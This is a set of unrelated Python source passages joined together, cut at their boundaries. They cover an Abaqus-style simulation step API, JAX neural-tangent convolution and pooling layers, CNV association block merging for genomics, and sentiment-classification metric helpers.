deltmx, mxdem, amplitude, extrapolation, matrixSolver, matrixStorage,
maintainAttributes, solutionTechnique, reformKernel, convertSDI)
return step
def ImplicitDynamicsStep(self, name: str, previous: str, description: str = '', timePeriod: float = 1,
nlgeom: Boolean = OFF, matrixStorage: SymbolicConstant = SOLVER_DEFAULT,
application: SymbolicConstant = ANALYSIS_PRODUCT_DEFAULT, adiabatic: Boolean = OFF,
timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
initialInc: float = None, minInc: float = None,
maxInc: typing.Union[SymbolicConstant, float] = DEFAULT,
hafTolMethod: SymbolicConstant = VALUE, haftol: float = None,
halfIncScaleFactor: float = None, nohaf: Boolean = OFF,
amplitude: SymbolicConstant = STEP,
alpha: typing.Union[SymbolicConstant, float] = DEFAULT,
initialConditions: SymbolicConstant = DEFAULT,
extrapolation: SymbolicConstant = ANALYSIS_PRODUCT_DEFAULT, noStop: Boolean = OFF,
maintainAttributes: Boolean = False, solutionTechnique: SymbolicConstant = FULL_NEWTON,
reformKernel: int = 8, convertSDI: SymbolicConstant = PROPAGATED) -> ImplicitDynamicsStep:
"""This method creates an ImplicitDynamicsStep object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].ImplicitDynamicsStep
Parameters
----------
name
A String specifying the repository key.
previous
A String specifying the name of the previous step. | |
if padding == Padding.CIRCULAR:
init_padding = Padding.SAME
def input_total_dim(input_shape):
return input_shape[lhs_spec.index('C')] * np.prod(filter_shape)
ntk_init_fn, _ = ostax.GeneralConv(dimension_numbers, out_chan, filter_shape,
strides, init_padding.name, W_init, b_init)
def standard_init_fn(rng, input_shape):
output_shape, (W, b) = ntk_init_fn(rng, input_shape)
norm = W_std / np.sqrt(input_total_dim(input_shape))
return output_shape, (W * norm, b * b_std)
if parameterization == 'ntk':
init_fn = ntk_init_fn
elif parameterization == 'standard':
init_fn = standard_init_fn
else:
raise ValueError('Parameterization not supported: %s' % parameterization)
def apply_fn(params, inputs, **kwargs):
W, b = params
if parameterization == 'ntk':
norm = W_std / np.sqrt(input_total_dim(inputs.shape))
b_rescale = b_std
elif parameterization == 'standard':
norm = 1.
b_rescale = 1.
apply_padding = padding
if padding == Padding.CIRCULAR:
apply_padding = Padding.VALID
inputs = _same_pad_for_filter_shape(inputs, filter_shape, strides, (1, 2),
'wrap')
return norm * lax.conv_general_dilated(
inputs,
W,
strides,
apply_padding.name,
dimension_numbers=dimension_numbers) + b_rescale * b
def kernel_fn(kernels):
"""Compute the transformed kernels after a conv layer."""
var1, nngp, var2, ntk, is_height_width, marginal, cross = (
kernels.var1, kernels.nngp, kernels.var2, kernels.ntk,
kernels.is_height_width, kernels.marginal, kernels.cross)
if cross > M.OVER_PIXELS and not is_height_width:
filter_shape_nngp = filter_shape[::-1]
strides_nngp = strides[::-1]
else:
filter_shape_nngp = filter_shape
strides_nngp = strides
if cross == M.OVER_PIXELS:
def conv_nngp_unscaled(x):
if _is_array(x):
x = _conv_nngp_4d(x, filter_shape_nngp, strides_nngp, padding)
return x
elif cross in [M.OVER_POINTS, M.NO]:
def conv_nngp_unscaled(x):
if _is_array(x):
x = _conv_nngp_5or6d_double_conv(x, filter_shape_nngp,
strides_nngp, padding)
return x
is_height_width = not is_height_width
else:
raise NotImplementedError(
"Only implemented for `OVER_PIXELS`, `OVER_POINTS` and `NO`;"
" supplied {}".format(cross))
def conv_nngp(x):
x = conv_nngp_unscaled(x)
return _affine(x, W_std, b_std)
if marginal == M.OVER_PIXELS:
def conv_var(x):
x = _conv_var_3d(x, filter_shape_nngp, strides_nngp, padding)
x = _affine(x, W_std, b_std)
return x
elif marginal in [M.OVER_POINTS, M.NO]:
def conv_var(x):
if _is_array(x):
x = _conv_nngp_5or6d_double_conv(x, filter_shape_nngp,
strides_nngp, padding)
x = _affine(x, W_std, b_std)
return x
else:
raise NotImplementedError(
"Only implemented for `OVER_PIXELS`, `OVER_POINTS` and `NO`;"
" supplied {}".format(marginal))
var1 = conv_var(var1)
var2 = conv_var(var2)
if parameterization == 'ntk':
nngp = conv_nngp(nngp)
ntk = conv_nngp(ntk) + nngp - b_std**2 if ntk is not None else ntk
elif parameterization == 'standard':
nngp_unscaled = conv_nngp_unscaled(nngp)
if ntk is not None:
ntk = (
input_total_dim(kernels.shape1) * nngp_unscaled + 1. +
W_std**2 * conv_nngp_unscaled(ntk))
nngp = _affine(nngp_unscaled, W_std, b_std)
return kernels._replace(
var1=var1, nngp=nngp, var2=var2, ntk=ntk, is_gaussian=True,
is_height_width=is_height_width, marginal=marginal, cross=cross)
setattr(kernel_fn, _COVARIANCES_REQ, {'marginal': M.OVER_PIXELS,
'cross': M.OVER_PIXELS})
return init_fn, apply_fn, kernel_fn
def Conv(out_chan, filter_shape, strides=None, padding=Padding.VALID.name,
W_std=1.0, W_init=_randn(1.0), b_std=0.0, b_init=_randn(1.0),
parameterization='ntk'):
"""Layer construction function for a convolution layer.
Based on `jax.experimental.stax.Conv`. Has a similar API apart from:
W_init and b_init only change the behavior of the finite width network, and
are not used by kernel_fn. In most cases, W_std and b_std should be used
instead
Args:
padding: in addition to `VALID` and `SAME' padding, supports `CIRCULAR`,
not available in `jax.experimental.stax.GeneralConv`.
parameterization: Either 'ntk' or 'standard'. These parameterizations are
the direct analogues for convolution of the corresponding
parameterizations for Dense layers.
"""
return _GeneralConv(_CONV_DIMENSION_NUMBERS, out_chan, filter_shape, strides,
padding, W_std, W_init, b_std, b_init, parameterization)
def _average_pool_nngp_5or6d(mat, window_shape, strides, padding,
normalize_edges):
"""Get covariances of average pooling outputs given inputs covariances `mat`.
Args:
mat: a 5D or 6D `np.ndarray` containing sample-(sample-)pixel-pixel
covariances. Has shape
`[batch_size_1, (batch_size_2,) height, height, width, width]`.
window_shape: tuple of two positive integers, the pooling spatial shape
(e.g. `(3, 3)`).
strides: tuple of two positive integers, the pooling strides, e.g. `(1, 1)`.
padding: a `Padding` enum, e.g. `Padding.CIRCULAR`.
normalize_edges: `True` to normalize output by the effective receptive
field, `False` to normalize by the window size. Only has effect at the
edges when `SAME` padding is used. Set to `True` to retain correspondence
to `ostax.AvgPool`.
Returns:
a 5D or 6D `np.ndarray` containing sample-(sample-)pixel-pixel covariances
of the average pooling outputs. Has shape
`[batch_size_1, (batch_size_2,) new_height, new_height,
new_width, new_width]`.
"""
if not _is_array(mat):
return mat
if padding == Padding.CIRCULAR:
pixel_axes = tuple(range(mat.ndim)[-4:])
mat = _same_pad_for_filter_shape(mat, _double_tuple(window_shape),
_double_tuple(strides), pixel_axes, 'wrap')
padding = Padding.VALID
window_shape = (1,) * (mat.ndim - 4) + _double_tuple(window_shape)
strides = (1,) * (mat.ndim - 4) + _double_tuple(strides)
nngp_out = lax.reduce_window(mat, 0., lax.add, window_shape, strides,
padding.name)
if padding == Padding.SAME and normalize_edges:
# `SAME` padding in `jax.experimental.stax.AvgPool` normalizes by actual
# window size, which is smaller at the edges.
one = np.ones(mat.shape, mat.dtype)
window_sizes = lax.reduce_window(one, 0., lax.add, window_shape, strides,
padding.name)
nngp_out /= window_sizes
else:
nngp_out /= np.prod(window_shape)
return nngp_out
@_layer
def AvgPool(window_shape,
strides=None,
padding=Padding.VALID.name,
normalize_edges=True):
"""Layer construction function for a 2D average pooling layer.
Based on `jax.experimental.stax.AvgPool`. Has a similar API apart from:
Args:
padding: in addition to `VALID` and `SAME' padding, supports `CIRCULAR`,
not available in `jax.experimental.stax.GeneralConv`.
normalize_edges: `True` to normalize output by the effective receptive
field, `False` to normalize by the window size. Only has effect at the
edges when `SAME` padding is used. Set to `True` to retain correspondence
to `ostax.AvgPool`.
"""
strides = strides or (1,) * len(window_shape)
padding = Padding(padding)
if padding == Padding.CIRCULAR:
init_fn, _ = ostax.AvgPool(window_shape, strides, Padding.SAME.name)
_, apply_fn_0 = ostax.AvgPool(window_shape, strides, Padding.VALID.name)
def apply_fn(params, inputs, **kwargs):
inputs = _same_pad_for_filter_shape(inputs, window_shape, strides, (1, 2),
'wrap')
res = apply_fn_0(params, inputs, **kwargs)
return res
elif not normalize_edges:
def rescaler(*args, **kwargs):
del args, kwargs # Unused.
return lambda outputs, _: outputs / np.prod(window_shape)
avgPool = ostax._pooling_layer(lax.add, 0., rescaler)
init_fn, apply_fn = avgPool(window_shape, strides, padding.name)
else:
init_fn, apply_fn = ostax.AvgPool(window_shape, strides, padding.name)
def kernel_fn(kernels):
"""Kernel transformation."""
var1, nngp, var2, ntk, is_gaussian, is_height_width, marginal, cross = (
kernels.var1, kernels.nngp, kernels.var2, kernels.ntk,
kernels.is_gaussian, kernels.is_height_width, kernels.marginal,
kernels.cross)
if is_height_width:
window_shape_nngp = window_shape
strides_nngp = strides
else:
window_shape_nngp = window_shape[::-1]
strides_nngp = strides[::-1]
nngp = _average_pool_nngp_5or6d(nngp, window_shape_nngp, strides_nngp,
padding, normalize_edges)
ntk = _average_pool_nngp_5or6d(ntk, window_shape_nngp, strides_nngp,
padding, normalize_edges)
var1 = _average_pool_nngp_5or6d(var1, window_shape_nngp, strides_nngp,
padding, normalize_edges)
if var2 is not None:
var2 = _average_pool_nngp_5or6d(var2, window_shape_nngp, strides_nngp,
padding, normalize_edges)
return kernels._replace(
var1=var1, nngp=nngp, var2=var2, ntk=ntk, is_gaussian=is_gaussian,
is_height_width=is_height_width, marginal=marginal, cross=cross)
setattr(kernel_fn, _COVARIANCES_REQ, {'marginal': M.OVER_POINTS,
'cross': M.NO})
return init_fn, apply_fn, kernel_fn
@_layer
def GlobalAvgPool():
"""Layer construction function for a global average pooling layer.
Pools over and removes (`keepdims=False`) all inner dimensions (from 1 to -2),
e.g. appropriate for `NHWC`, `NWHC`, `CHWN`, `CWHN` inputs.
Warnings: assumes the next layer will be Dense (optionally preceded by
a nonlinearity), otherwise the kernels will not be correct
"""
warnings.warn("GlobalAvgPool assumes the next layer will be Dense"
" (optionally preceded by a nonlinearity),"
" otherwise the kernels will not be correct!")
def init_fn(rng, input_shape):
output_shape = input_shape[0], input_shape[-1]
return output_shape, ()
def apply_fn(params, inputs, **kwargs):
pixel_axes = tuple(range(1, inputs.ndim - 1))
return np.mean(inputs, axis=pixel_axes)
def kernel_fn(kernels):
var1, nngp, var2, ntk, is_gaussian, marginal, cross = (
kernels.var1, kernels.nngp, kernels.var2, kernels.ntk,
kernels.is_gaussian, kernels.marginal, kernels.cross)
def _average_pool(ker_mat):
pixel_axes = tuple(range(ker_mat.ndim)[-4:])
return np.mean(ker_mat, axis=pixel_axes)
nngp = _average_pool(nngp)
ntk = _average_pool(ntk) if _is_array(ntk) else ntk
var1 = _average_pool(var1)
if var2 is not None:
var2 = _average_pool(var2)
return kernels._replace(
var1=var1, nngp=nngp, var2=var2, ntk=ntk, is_gaussian=is_gaussian,
is_height_width=True, marginal=M.OVER_ALL, cross=M.OVER_ALL)
setattr(kernel_fn, _COVARIANCES_REQ, {'marginal': M.OVER_POINTS,
'cross': M.NO})
return init_fn, apply_fn, kernel_fn
@_layer
def Flatten():
"""Layer construction function for flattening all but the leading dim.
Based on `jax.experimental.stax.Flatten`. Has a similar API.
Warnings: assumes the next layer will be Dense (optionally preceded by
a nonlinearity), otherwise the kernels will not be correct
"""
warnings.warn("Flatten assumes the next layer will be Dense"
" (optionally preceded by a nonlinearity),"
" otherwise the kernels will not be correct!")
init_fn, apply_fn = ostax.Flatten
def kernel_fn(kernels):
"""Compute kernels."""
var1, nngp, var2, ntk, is_gaussian, marginal, cross = (
kernels.var1, kernels.nngp, kernels.var2, kernels.ntk,
kernels.is_gaussian, kernels.marginal, kernels.cross)
if nngp.ndim == 2:
return kernels
def trace(x):
count = x.shape[-4] * x.shape[-2]
y = np.trace(x, axis1=-2, axis2=-1)
z = np.trace(y, axis1=-2, axis2=-1)
return z / count
if marginal == M.OVER_PIXELS:
var1 = np.mean(var1, axis=(1, 2))
var2 = var2 if var2 is None else np.mean(var2, axis=(1, 2))
elif marginal in [M.OVER_POINTS, M.NO]:
if marginal == M.NO:
var1 = np.moveaxis(np.diagonal(var1, axis1=0, axis2=1), -1, 0)
if var2 is not None:
var2 = np.moveaxis(np.diagonal(var2, axis1=0, axis2=1), -1, 0)
var1 = trace(var1)
var2 = var2 if var2 is None else trace(var2)
elif marginal != M.OVER_ALL:
raise NotImplementedError(
"Only implemented for , `OVER_ALL`, `OVER_PIXELS`, `OVER_POINTS` and "
" `NO`; supplied {}".format(marginal))
if cross == | |
null_variance,
cs_val, block_merge_dist)
hpo_info['blocks'][block_id] = {'coords' : block,
'refine_res' : refine_res,
'credset_coords' : credset_coords,
'credset_bt' : credset_bt,
'credset_windows' : credset_windows}
# If no windows are significant, add empty placeholder dict for all windows
else:
hpo_info['all_windows'] = {}
return hpo_info
def load_all_hpos(statslist, secondary_p_cutoff=0.05, n_nominal_cutoff=2,
secondary_or_nominal=True, fdr_q_cutoff=0.05,
secondary_for_fdr=False, block_merge_dist=200000,
block_prefix='window_block', refine_secondary=False,
cs_val=0.95):
"""
Wrapper function to process each HPO with process_hpo()
Returns a dict with one entry per HPO
"""
hpo_data = {}
with open(statslist) as infile:
reader = csv.reader(infile, delimiter='\t')
for hpo, stats_in, pval, in reader:
print('Loading data from {}...'.format(hpo))
primary_p_cutoff = float(pval)
hpo_data[hpo] = process_hpo(hpo, stats_in, primary_p_cutoff,
p_is_neg_log10=True,
secondary_p_cutoff=secondary_p_cutoff,
n_nominal_cutoff=n_nominal_cutoff,
secondary_or_nominal=secondary_or_nominal,
fdr_q_cutoff=fdr_q_cutoff,
secondary_for_fdr=secondary_for_fdr,
block_merge_dist=block_merge_dist,
block_prefix=block_prefix,
refine_secondary=refine_secondary,
cs_val=cs_val)
return hpo_data
def calc_cnv_cov(cnvbed, hpo_data, cnv, frac=0.5, max_search_dist=20000000):
"""
Compute a CNV covariance matrix for cases from each HPO per chromosome
"""
cnv_cov = {}
cnvbt_orig = pbt.BedTool(cnvbed)
contigs = set([x.chrom for x in cnvbt_orig])
# Iterate over each HPO
for hpo, hdat in hpo_data.items():
print('Computing covariance matrixes for {}...'.format(hpo))
# Make single bedtool of all windows per contig
wbt_dict = {contig : {'all_wids' : set()} for contig in contigs}
for wid in hdat['all_windows'].keys():
contig = wid.split('_')[0]
wbt_dict[contig]['all_wids'].add(wid)
for contig in contigs:
wbt_str = ''
for wid in wbt_dict[contig]['all_wids']:
wbt_str += '\t'.join(wid.split('_') + [wid]) + '\n'
wbt_dict[contig]['wbt'] = pbt.BedTool(wbt_str, from_string=True)
# Filter CNVs by HPO and CNV type
cnvbt = cnvbt_orig.filter(lambda x: hpo in x[5])
if cnv != 'NS':
cnvbt = cnvbt.filter(lambda x: x[4] == cnv).saveas()
# Make covariance matrix of all by all windows per chromosome
cov_dfs = {}
for contig in contigs:
# Filter CNVs and windows to contig of interest
cnvbt_contig = cnvbt.filter(lambda x: x.chrom == contig)
wbt_contig = wbt_dict[contig]['wbt']
all_contig_wids = wbt_dict[contig]['all_wids']
# Make dict mapping window ID to dict of set(CNV ids)
cnvs_per_window = {wid : set() for wid in all_contig_wids}
for hit in cnvbt_contig.intersect(wbt_contig, wa=True, wb=True, F=frac):
cnvid = hit[3]
wid = hit[-1]
cnvs_per_window[wid].add(cnvid)
# Compute covarance for all pairs of windows
cov_dfs[contig] = pd.DataFrame(columns=all_contig_wids)
for wid_a in all_contig_wids:
jac_l = []
# If first window has no CNVs, Jaccard index = 0 for all mates
cnvs_a = cnvs_per_window[wid_a]
if len(cnvs_a) == 0:
cov_dfs[contig].loc[wid_a] = [0.0] * len(all_contig_wids)
continue
for wid_b in all_contig_wids:
# If the Jaccard index has already been computed,
# can copy value across matrix diagonal
if wid_b in cov_dfs[contig].index:
jac_l.append(cov_dfs[contig].loc[wid_b, wid_a])
continue
# If second window has no CNVs, Jaccard index = 0
cnvs_b = cnvs_per_window[wid_b]
if len(cnvs_b) == 0:
jac_l.append(0.0)
continue
# Otherwise, compute Jaccard index as long as windows are
# closer than max_search_dist apart
mid_a = np.mean([int(x) for x in wid_a.split('_')[1:]])
mid_b = np.mean([int(x) for x in wid_b.split('_')[1:]])
if np.abs(mid_b - mid_a) > max_search_dist:
jac_l.append(0.0)
else:
jac_l.append(len(cnvs_a.intersection(cnvs_b)) / len(cnvs_a.union(cnvs_b)))
cov_dfs[contig].loc[wid_a] = jac_l
cnv_cov[hpo] = cov_dfs
return cnv_cov
def merge_blocks_by_cov(hpo_data, cnv_cov, jac_cutoff=0.8,
block_merge_dist=200000, cs_val=0.95,
block_prefix='window_block'):
"""
Merge blocks from the same HPO by CNV covariance
"""
for hpo, hdat in hpo_data.items():
all_bids = list(hdat['blocks'].keys())
# Construct graph of all blocks
G = nx.Graph()
for bid in all_bids:
G.add_node(bid)
# Add edges between pairs of nodes where at least one pair of windows from
# their credible intervals shares CNV cov >= jac_cutoff
for bid_a in all_bids:
chrom_a = hdat['blocks'][bid_a]['credset_coords'][0][0]
for bid_b in all_bids:
chrom_b = hdat['blocks'][bid_b]['credset_coords'][0][0]
# Only process nonredundant block pairs on the same chromosome
if bid_a == bid_b or chrom_a != chrom_b:
continue
cov_df = cnv_cov[hpo][chrom_a]
wids_a = hdat['blocks'][bid_a]['credset_windows']
wids_b = hdat['blocks'][bid_b]['credset_windows']
cov_df = cov_df.loc[cov_df.index.isin(wids_a),
cov_df.columns.isin(wids_b)]
best_jac = cov_df.max().max()
if best_jac >= jac_cutoff:
G.add_edge(bid_a, bid_b)
# Collapse all subgraphs of two or more nodes
k = 0
for cluster in nx.connected_components(G):
if len(cluster) > 1:
k += 1
new_bid = '_'.join([hpo, block_prefix, 'merged', str(k)])
# Take union of all windows
windows = set()
for bid in cluster:
windows.update(hdat['blocks'][bid]['refine_res'].keys())
# Update refinement
window_priors = {window : 1 / len(windows) for window in windows}
refine_res, credset_coords, credset_bt, credset_windows = \
refine(window_priors, hdat['all_windows'], cs_val=cs_val,
cs_merge_buffer=block_merge_dist)
# Determine maximum significance level of any window in credible set
if any([hdat['all_windows'][wid]['gw_sig'] for wid in credset_windows]):
credset_max_sig = 'genome_wide'
elif any([hdat['all_windows'][wid]['fdr_sig'] for wid in credset_windows]):
credset_max_sig = 'FDR'
else:
credset_max_sig = 'not_significant'
# Add new merged block to hpo_data
block = credset_bt.merge(d=int(10e10))
hpo_data[hpo]['blocks'][new_bid] = \
{'coords' : block,
'refine_res' : refine_res,
'credset_coords' : credset_coords,
'credset_bt' : credset_bt,
'credset_windows' : credset_windows,
'credset_max_sig' : credset_max_sig}
# Remove all original member blocks
for bid in cluster:
hpo_data[hpo]['blocks'].pop(bid)
return hpo_data
def clump_windows(cov_df, sig_wids, jac_cutoff=0.2):
"""
inputs:
cov_df : an input matrix of CNV covariance for pairs of windows
jac_cutoff : minimum Jaccard index to treat windows as non-independent
outputs:
a list of clumps of window IDs
"""
# Make graph of all windows
all_wids = list(cov_df.columns)
wg = nx.Graph()
for wid in all_wids:
wg.add_node(wid)
# Annotate edges with Jaccard index if >= jac_cutoff
for sig_wid in sig_wids:
for other_wid in all_wids:
jac = cov_df.loc[sig_wid, other_wid]
if jac >= jac_cutoff:
wg.add_edge(sig_wid, other_wid)
wg.edges[sig_wid, other_wid]['jac'] = jac
clumps = []
for subg in nx.connected_components(wg):
if len(set(sig_wids).intersection(set(subg))) > 1:
clumps.append(list(subg))
return clumps
def split_blocks_by_cov(hpo_data, cnv_cov, jac_cutoff=0.2, block_prefix='window_block',
null_variance=0.42 ** 2, cs_val=0.95):
"""
Split blocks based on CNV covariance
"""
for hpo, hdat in hpo_data.items():
kn = 0
sig_wids = list(hdat['sig_windows'].keys())
orig_bids = list(hdat['blocks'].keys())
for block_id in orig_bids:
bdat = hdat['blocks'][block_id]
block_wids = list(bdat['refine_res'].keys())
sig_block_wids = list(set(sig_wids).intersection(set(block_wids)))
chrom = bdat['credset_coords'][0][0]
cov_df = cnv_cov[hpo][chrom]
# Note: only consider covariance between sig windows when assessing independence
# to avoid chaining of single-linkage between intermediate blocks
cov_df = cov_df.loc[cov_df.index.isin(sig_block_wids),
cov_df.columns.isin(sig_block_wids)]
window_clumps = clump_windows(cov_df, sig_block_wids, jac_cutoff)
# If multiple independent CNV clumps are found, split into independent blocks
if len(window_clumps) > 1:
for i in range(len(window_clumps)):
# Collect data corresponding to split block
windows = window_clumps[i]
windows_bt = pbt.BedTool('\n'.join(['\t'.join(x.split('_') + [x]) for x in windows]),
from_string=True).sort()
coords = windows_bt.merge(c=4, o='distinct')
window_priors = {window : 1 / len(windows) for window in windows}
refine_res, credset_coords, credset_bt, credset_windows \
= refine(window_priors, hdat['all_windows'], null_variance,
cs_val, cs_merge_buffer=0)
kn += 1
new_block_id = '_'.join([hpo, block_prefix, 'split', str(kn)])
# Determine maximum significance level of any window in credible set
if any([hdat['all_windows'][wid]['gw_sig'] for wid in credset_windows]):
credset_max_sig = 'genome_wide'
elif any([hdat['all_windows'][wid]['fdr_sig'] for wid in credset_windows]):
credset_max_sig = 'FDR'
else:
credset_max_sig = 'not_significant'
# Update hpo_data
hpo_data[hpo]['blocks'][new_block_id] = \
{'coords' : coords,
'refine_res' : refine_res,
'credset_coords' : credset_coords,
'credset_bt' : credset_bt,
'credset_windows' : credset_windows,
'credset_max_sig' : credset_max_sig}
# Remove original block after splitting
hpo_data[hpo]['blocks'].pop(block_id)
return hpo_data
def assign_or_quantiles(hpo_data, n_or_bins=1):
"""
Assign all associations into quantiles based on effect size
"""
# Gather effect size estimate of most significant window per block
lnors = {}
for hpo, hdat in hpo_data.items():
for bid, bdat in hdat['blocks'].items():
best_p = 1
best_wid = None
best_lnor = 0
for wid in list(bdat['refine_res'].keys()):
w_p = hdat['all_windows'][wid]['primary_p']
if w_p < best_p:
best_p = w_p
best_wid = wid
best_lnor = hdat['all_windows'][wid]['lnOR']
lnors[bid] = {'lnor' : best_lnor, 'hpo' : hpo}
# Assign blocks to quantiles
quants = np.floor(n_or_bins * np.argsort([x['lnor'] for x in lnors.values()]) / len(lnors))
qdict = {a : int(b) for a, b in zip(lnors.keys(), quants)}
for bid in qdict.keys():
hpo_data[lnors[bid]['hpo']]['blocks'][bid]['lnor_quantile'] = qdict[bid]
return hpo_data
def estimate_null_variance_basic(hpo_data, Wsq, dev_hpos=[], n_or_bins=1,
split_gw_fdr=False):
"""
Estimates null variance from average of all significant windows and best window per block
"""
# Compute 2 null variance estimates for refining:
# 1. Mean of all significant windows
# 2. Mean of all top windows (one per block)
vardict_sig = {hpo : {'gw' : {i : [] for i in range(n_or_bins + 1)},
'fdr' : {i : [] for i in range(n_or_bins + 1)}} \
for hpo in hpo_data.keys()}
vardict_best = {hpo : {'gw' : {i : [] for i in range(n_or_bins + 1)},
'fdr' : {i : [] for i in range(n_or_bins + 1)}} \
for hpo in hpo_data.keys()}
# Collect variance estimates from each significant block
for hpo, dat in hpo_data.items():
| |
<filename>target_extraction/analysis/sentiment_metrics.py
'''
This module contains functions that expect a TargetTextCollection that contains
`target_sentiments` key that represent the true sentiment values and a prediction
key e.g. `sentiment_predictions`. Given these the function will return either a
metric score e.g. Accuracy or a list of scores based on the arguments given
to the function and if the `sentiment_predictions` key is an array of values.
Arguments for all functions in this module:
1. TargetTextCollection -- Contains the true and predicted sentiment scores
2. true_sentiment_key -- Key that contains the true sentiment scores
for each target in the TargetTextCollection
3. predicted_sentiment_key -- Key that contains the predicted sentiment scores
for each target in the TargetTextCollection
4. average -- If the predicting model was ran *N* times whether or not to
average the score over the *N* runs. Assumes array_scores is False.
5. array_scores -- If average is False and you a model that has predicted
*N* times then this will return the *N* scores, one for each run.
6. assert_number_labels -- Whether or not to assert this many number of unique
labels must exist in the true sentiment key. If this is None then the
assertion is not raised.
7. ignore_label_differences -- If True then the ValueError will not be
raised if the predicted sentiment values are not in the true
sentiment values. See :py:func:`get_labels` for more details.
:raises ValueError: If the the prediction model has ran *N* times where
*N>1* and `average` or `array_scores` are either both
True or both False.
:raises ValueError: If the number of predictions made per target are
different or zero.
:raises ValueError: If only one set of model prediction exist then
`average` and `array_scores` should be False.
:raises KeyError: If either the `true_sentiment_key` or
`predicted_sentiment_key` does not exist.
:raises LabelError: If `assert_number_labels` is not None and the number of
unique true labels does not equal the `assert_number_labels`
this is raised.
'''
import functools
from typing import Union, Optional, Callable, Tuple, List, Any
import statistics
import numpy as np
from sklearn.metrics import accuracy_score, f1_score
from target_extraction.data_types import TargetTextCollection, TargetText
class LabelError(Exception):
'''
If the number of unique labels does not match your expected number of
unique labels.
'''
def __init__(self, true_number_unique_labels: int,
number_unique_labels_wanted: int) -> None:
'''
:param true_number_unique_labels: Number of unique labels that came
from the dataset
:param number_unique_labels_wanted: Expected number of unique labels
that should be in the dataset.
'''
error_string = ('Number of unique labels in the dataset '
f'{true_number_unique_labels}. The number of unique '
'labels expected in the dataset '
f'{number_unique_labels_wanted}')
super().__init__(error_string)
def metric_error_checks(func: Callable[[TargetTextCollection, str, str, bool,
bool, Optional[int], bool],
Union[float, np.ndarray]]
) -> Callable[[TargetTextCollection, str, str, bool,
bool, Optional[int], bool],
Union[float, np.ndarray]]:
'''
Decorator for the metric functions within this module. Will raise any of
the Errors stated above in the module documentation before the metric
functions is called.
'''
@functools.wraps(func)
def wrapper(target_collection: TargetTextCollection,
true_sentiment_key: str, predicted_sentiment_key: str,
average: bool, array_scores: bool,
assert_number_labels: Optional[int] = None,
ignore_label_differences: bool = True,
**kwargs
) -> Union[float, np.ndarray]:
# Check that the TargetTextCollection contains both the true and
# predicted sentiment keys
unique_label_set = set()
total_number_model_predictions = 0
for target_object in target_collection.values():
target_object: TargetText
target_object._key_error(true_sentiment_key)
target_object._key_error(predicted_sentiment_key)
for true_label in target_object[true_sentiment_key]:
unique_label_set.add(true_label)
# Cannot have inconsistent number of model predictions
number_model_predictions = len(target_object[predicted_sentiment_key])
if total_number_model_predictions == 0:
total_number_model_predictions = number_model_predictions
else:
if total_number_model_predictions != number_model_predictions:
raise ValueError('The number of predictions made per '
'Target within the collection is different'
f'. This TargetText could have no targets'
' within the collection thus this error '
'will be raise. TargetText that has an error'
f' {target_object}\nThe number of predcitions'
f' that this object should have: {total_number_model_predictions}')
# Cannot have zero predictions
if total_number_model_predictions == 0:
raise ValueError('The number of predictions made per target are zero')
# Perform the LabelError check
if assert_number_labels is not None:
number_unique_labels = len(unique_label_set)
if number_unique_labels != assert_number_labels:
raise LabelError(number_unique_labels, assert_number_labels)
# If the dataset has one model prediction per target then average and
# array_scores should be False
if number_model_predictions == 1:
if average or array_scores:
raise ValueError('When only one set of predictions per target'
' then `average` and `array_scores` have to '
'be both False')
else:
if average == array_scores:
raise ValueError('As the number of model predictions is > 1 '
'then either `average` or `array_scores` have '
'to be True but not both.')
return func(target_collection, true_sentiment_key,
predicted_sentiment_key, average, array_scores,
assert_number_labels, ignore_label_differences,
**kwargs)
return wrapper
def get_labels(target_collection: TargetTextCollection,
true_sentiment_key: str, predicted_sentiment_key: str,
labels_per_text: bool = False,
ignore_label_differences: bool = True
) -> Tuple[Union[List[Any], List[List[Any]]],
Union[List[List[Any]], List[List[List[Any]]]]]:
'''
:param target_collection: Collection of targets that have true and predicted
sentiment values.
:param true_sentiment_key: Key that contains the true sentiment scores
for each target in the TargetTextCollection
:param predicted_sentiment_key: Key that contains the predicted sentiment
scores for each target in the
TargetTextCollection. It assumes that the
predictions is a List of List where the
outer list are the number of model runs and
the inner list is the number of targets to
predict for, the the second Tuple of the
example return for an example of this.
:param labels_per_text: If True instead of returning a List[Any] it will
return a List[List[Any]] where in the inner list
represents the predictions per text rather than in
the normal case where it is all predictions ignoring
which text they came from.
:param ignore_label_differences: If True then the ValueError will not be
raised if the predicted sentiment values
are not in the true sentiment values.
:returns: A tuple of 1; true sentiment value 2; predicted sentiment values.
where the predicted sentiment values is a list of predicted
sentiment value, one for each models predictions.
See `Example of return 2` for an example of what this means
where in that example there are two texts/sentences.
:raises ValueError: If the number of predicted sentiment values are not
equal to the number true sentiment values.
:raises ValueError: If the labels in the predicted sentiment values are not
in the true sentiment values.
:Example of return 1: (['pos', 'neg', 'neu'], [['neg', 'pos', 'neu'],
['neu', 'pos', 'neu']])
:Example of return 2: ([['pos'], ['neg', 'neu']], [[['neg'], ['pos', 'neu']],
[['neu'], ['pos', 'neu']]])
'''
all_predicted_values: List[List[Any]] = []
all_true_values: List[Any] = []
for target_object in target_collection.values():
target_object: TargetText
true_values = target_object[true_sentiment_key]
if labels_per_text:
all_true_values.append(true_values)
else:
all_true_values.extend(true_values)
predicted_values_lists = target_object[predicted_sentiment_key]
# Create a list per model predictions
if all_predicted_values == []:
for _ in predicted_values_lists:
all_predicted_values.append([])
for index, prediction_list in enumerate(predicted_values_lists):
if labels_per_text:
all_predicted_values[index].append(prediction_list)
else:
all_predicted_values[index].extend(prediction_list)
# Check that the number of values in the predicted values is the same as
# the number of values in the true list
true_number_values = len(all_true_values)
for prediction_list in all_predicted_values:
number_predictions = len(prediction_list)
if number_predictions != true_number_values:
raise ValueError(f'Number targets predicted {number_predictions}. '
f'Number of targets {true_number_values}. '
'These should be the same!')
# Check that the values in True are the same as those in predicted
if labels_per_text:
unique_true_values = set([value for values in all_true_values for value in values])
else:
unique_true_values = set(all_true_values)
for prediction_list in all_predicted_values:
if labels_per_text:
unique_predicted_values = set([value for values in prediction_list for value in values])
else:
unique_predicted_values = set(prediction_list)
if (unique_predicted_values.difference(unique_true_values) and
not ignore_label_differences):
raise ValueError(f'Values in the predicted sentiment are not in the'
' True sentiment values. Values in predicted '
f'{unique_predicted_values}, values in True '
f'{unique_true_values}')
return (all_true_values, all_predicted_values)
@metric_error_checks
def accuracy(target_collection: TargetTextCollection,
true_sentiment_key: str, predicted_sentiment_key: str,
average: bool, array_scores: bool,
